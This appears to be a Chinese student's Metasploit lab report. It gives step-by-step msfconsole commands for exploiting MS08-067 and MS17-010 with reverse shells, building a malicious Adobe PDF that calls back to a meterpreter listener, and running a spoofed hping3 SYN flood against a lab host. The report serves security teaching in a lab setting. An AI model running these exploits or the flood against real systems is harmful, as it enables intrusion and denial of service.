20165306 Exp5 MSF基础应用
Exp5 MSF基础应用
一、实践概述
1. 实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。实现:
1.1一个主动攻击实践
- ms08-067+windows/shell_reverse_tcp(成功)
1.2 一个针对浏览器的攻击
- ms17_010_eternalblue+generic/shell_reverse_tcp(成功)
1.3 一个针对客户端的攻击
- Adobe+windows/meterpreter/reverse_tcp(成功)
1.4 成功应用任何一个辅助模块
- dos/tcp/synflood(成功且唯一)
2.基础问题回答
用自己的话解释什么是exploit,payload,encode.
- exploit:测试者利用系统、程序或服务的漏洞进行攻击的一个过程。
- payload:攻击者在目标系统上执行的一段攻击代码,该代码具有反弹连接、创建用户、执行其他系统命令的功能。
- encode:一是为了避免使攻击载荷不能完整运行的“坏字符”,二是为了改变特征码,帮助攻击载荷避免被杀软发现。
二、实验步骤
任务一 Windows服务渗透攻击——MS08-067安全漏洞
攻击机Kali:10.1.1.169
靶机Win2000:10.1.1.154
payload:windows/shell_reverse_tcp
1.攻击机和靶机改成桥接模式,相互ping通
2.msfconsole
进入控制台
search ms08-067
查找漏洞
3.如上图,输入use exploit/windows/smb/ms08_067_netapi
指令选择漏洞
show options
查看设置信息
set RHOSTS 10.1.1.154
设置Win2000 IP
search portscan
搜索端口
4.如上图,输入use auxiliary/scanner/portscan/tcp
选择漏洞
show options
查看设置信息
set RHOSTS 10.1.1.154
exploit
看到445端口开放
5.输入use exploit/windows/smb/ms08_067_netapi
show payloads
查看可用payload
如上图,输入set payload windows/shell_reverse_tcp
选择payload
show options
exploit
进行攻击成功
任务二 一个针对浏览器的攻击——ms17-010
攻击机Kali:192.168.43.91
靶机Win7专业版:192.168.43.182
payload:generic/shell_reverse_tcp
1.攻击机和靶机改成桥接模式,关闭防火墙,相互ping通
2.msfconsole
进入控制台
search ms17-010
查找漏洞
3.如上图,输入use exploit/windows/smb/ms17_010_eternalblue
指令选择漏洞
show payloads
显示可用攻击载荷
set payload generic/shell_reverse_tcp
选择攻击载荷
show options
查看配置信息
set LHOSTS 192.168.43.91
设置Kali IP
set RHOSTS 192.168.43.182
设置Win7 IP
exploit
进行攻击成功
任务三 一个针对客户端的攻击——Adobe
攻击机Kali:10.1.1.169
靶机WinXPattacker:10.1.1.194
payload:windows/meterpreter/reverse_tcp
1.攻击机和靶机改成桥接模式,相互ping通
2.msfconsole
进入控制台
search adobe
查找漏洞
3.如下图,输入use windows/fileformat/adobe_cooltype_sing
指令选择漏洞
show payloads
显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.169
设置Kali IP
set LPORT 5306
设置攻击端口
set FILENAME 5306.pdf
设置生成的pdf文件名
exploit
4.开启一个新终端
cd /root/.msf4/local
进入pdf文件保存目录
cp 5306XYH.pdf /mnt/hgfs/XYH
把pdf文件复制到与主机的共享文件夹中,再把pdf从主机拖到winXP
5.回到原控制台
back
退出当前模块
use exploit/multi/handler
进入监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.169
设置kali IP
set LPORT 5306
设置攻击端口
exploit
开始监听
6.WinXP中打开5306XYH.pdf
回到Kali发现回连成功
任务四 成功应用任何一个辅助模块
攻击机Kali:10.1.1.169
靶机Win7:10.1.1.113
漏洞:dos/tcp/synflood(唯一)
1.攻击机和靶机改成桥接模式,相互ping通
2.msfconsole
进入控制台
show auxiliary
命令显示所有的辅助模块以及他们的用途
一眼相中TCP SYN FLOODER
3.SYN Flood攻击原理
SYN:同步序列编号(Synchronize Sequence Numbers),是TCP/IP建立连接时使用的握手信号。
SYN Flood利用TCP协议缺陷,通过一定的操作破坏TCP三次握手建立正常连接,占用并耗费系统资源,使得被攻击方资源耗尽,无法及时回应或处理正常的服务请求。
攻击原理:通常,客户端在短时间内伪造大量不存在的IP地址,向服务器不断地发送syn包,服务器回复确认包,在进行第三次握手时,服务器等待客户的确认,由于源地址是不存在的,服务器需要不断的重发直至超时,才将此条目从未连接队列删除。这些伪造的SYN包将长时间占用未连接队列,正常的SYN请求不能进去以及被丢弃,目标系统运行缓慢,引起网络拥堵。
4.Win7下按Ctrl+Alt+Ins
启动任务管理器
查看性能
,监控CPU的利用率,开启Wireshark抓包
5.Kali中输入hping3 -q -n -a 5.3.0.6 -S -s 5306 --keep -p 445 --flood 10.1.1.113
其中5.3.0.6为伪造源IP,5306为伪造源端口,445为目的端口,10.1.1.113为目的IP
6.查看Win7的任务管理器和wireshark抓包结果
如图,Win7的性能利用率已经达到96%并居高不下。Wireshark抓到的包显示大量源地址为5.3.0.6,在给靶机win7发送请求连接,进行SYN Flood攻击。综上表明已经攻击成功。
7.Kali中按Ctrl+C
结束攻击
查看Win7的任务管理器,性能利用率恢复正常。
20165306 Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165232 Exp5 MSF基础应用
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
随机推荐
- Linux —— 命令
Linux —— 命令 各种查看 查看文件绝对路径 pwd 查看某服务占用端口 netstat -ano |grep mysql Linux 下的复制粘贴 0.在KDE/Gnome下: 复制命令:Ct ...
- Centos7 初始化硬盘分区、挂载
1.通过命令fdisk-l查看硬盘信息 可以看到有两块硬盘/dev/vda和/dev/vdb,启动vda是系统盘vdb是我们新增的数据盘. 2.执行以下命令,进入fdisk模式,开始对新增数据盘执行分 ...
- Centos7安装jexus,部署asp.net core,asp.net mvc
什么是Jexus 官网解释:https://www.jexus.org/ Jexus是一款Linux平台上的高性能WEB服务器和负载均衡网关,Jexus Web Service,简称JWS,以支持AS ...
- java代码审计中的一些常见漏洞及其特征函数
文章来源:https://xz.aliyun.com/t/1633 最近在先知上看到之前有篇关于java代码审计的文章总结的蛮好,记录以下特征函数,方便查阅,同时自己也会将在平时代码审计过程中积累的函 ...
- 记一次Linux服务器因redis漏洞的挖矿病毒入侵
中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱. 所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!! ...
- WEB服务器,TOMCAT和servlet之间的关系
WEB服务器,TOMCAT和servlet之间的关系 什么是WEB服务器Web服务器是指能够为发出请求的浏览器提供文档的程序.服务器是 一种被动程序,只有浏览器发出请求的时候才会响应.应用层使用 的是 ...
- SSM框架和SSH框架的区别
SSH和SSM定义 SSH 通常指的是 Struts2 做控制器(controller),spring 管理各层的组件,hibernate 负责持久化层. SSM 则指的是 SpringMVC 做控制 ...
- [阿里云] 云数据库mongodb外网连接
原教程,https://www.alibabacloud.com/help/zh/doc-detail/55253.htm 但按照这里的教程,还是连不上mongdb,甚至在ECS上也ping不通mon ...
- Android配置AndroidAnnotations注解框架配置
1在新建的普通项目里面,新建一个compile-libs文件夹,将下载来的androidannotation-xx.jar添加到compile-libs文件夹下,将androidannotation- ...
- LoadXml 加载XML时,报错:“根级别上的数据无效。 行1,位置1“
==XML=================================== <?xml version="1.0" encoding="utf-8" ...